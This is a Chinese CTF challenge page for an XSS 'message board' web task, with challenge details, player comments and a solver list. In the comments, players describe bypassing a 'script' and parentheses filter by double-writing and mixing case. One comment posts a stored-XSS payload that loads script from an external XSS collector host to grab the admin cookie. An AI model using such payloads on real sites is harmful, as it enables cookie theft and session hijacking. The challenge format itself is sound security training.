留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 167
提  示: 需要xss平台接收flag
描  述:
flag{}
...
登录回复
评论
17695688750 2年前
举报

去xsspt吧xss代码复制到留言板,留言板设置了()和script过滤,想办法绕过

回复 0
zzzlu 1年前
举报

这个xsspt要钱,好坑的平台

回复 0
sshui 2年前
举报

大哥,能给一下payload吗?

回复 2
18256197318 2年前
举报

双写+大小写绕过

回复 0
chaojiikun 9月前
举报

@harry 哥你出的什么题坑死我了

回复 0
jojojoker 2年前
举报

@harry 需要登录到后台才能拿到管理员的cookie吧,不然拿我自己的cookie?

回复 0
sshui 2年前
举报

@harry 大哥写个wp吧(/(ㄒoㄒ)/~~)

回复 0
harry 管理员 2年前
举报

@追风亚索 这是xss题不需要登录后台

回复 0
追风亚索 2年前
举报

要写脚本才能知道密码吗

回复 0
追风亚索 2年前
举报

密码是什么登不进管理员账号

回复 0
Striker123456 2年前
举报

咋打不出cookiehello[img]123[img]onerror=<sCRScRiPTiPt/SrC=//xss.yt/j5Ys>[img][/img]

回复 0
Striker123456 2年前
举报

这道题,我是不是做过?

回复 0

WriteUp

image
小蔡

5 金币

立即查看

评分(3)

解题动态

Bug@Bug 攻破了该题 19天前
eric82 攻破了该题 27天前
妈!有人打我 攻破了该题 1月前
natai 攻破了该题 1月前
qingshen 攻破了该题 1月前
liusongxn 攻破了该题 1月前
dlgz 攻破了该题 1月前
R4nd0m 攻破了该题 1月前
chenlinXdb 攻破了该题 1月前
霜月夜 攻破了该题 1月前
xiajinsong2022 攻破了该题 1月前
kukuqi666 攻破了该题 1月前
bugtest 攻破了该题 2月前
hsy2078844367 攻破了该题 2月前
safeline 攻破了该题 2月前
huihuiwudi 攻破了该题 2月前
ZZZZZZYx 攻破了该题 3月前
烛火 攻破了该题 3月前
笨蛋奶妈 攻破了该题 4月前
雾島风起時 攻破了该题 4月前
问题反馈